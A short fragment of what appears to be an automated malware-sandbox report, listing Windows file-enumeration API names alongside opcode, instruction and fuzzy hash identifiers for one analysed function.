                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                    • String ID:
                    • API String ID: 2667927680-0
                    • Opcode ID: 4c589258798313bbadc309ab50ab58bbb038f745a9670b65916ca3a5e9792fa6
                    • Instruction ID: 080dcad8e4f3baff790ae4c296ea466eb29b49efab4b3f8174de317bdc6c4008
                    • Opcode Fuzzy Hash: 4c589258798313bbadc309ab50ab58bbb038f745a9670b65916ca3a5e9792fa6
                    • Instruction Fuzzy Hash: AD21A7B690020867C755F760EC46FE9333CAB54700F004549B64DDA181EE759ACDDBA3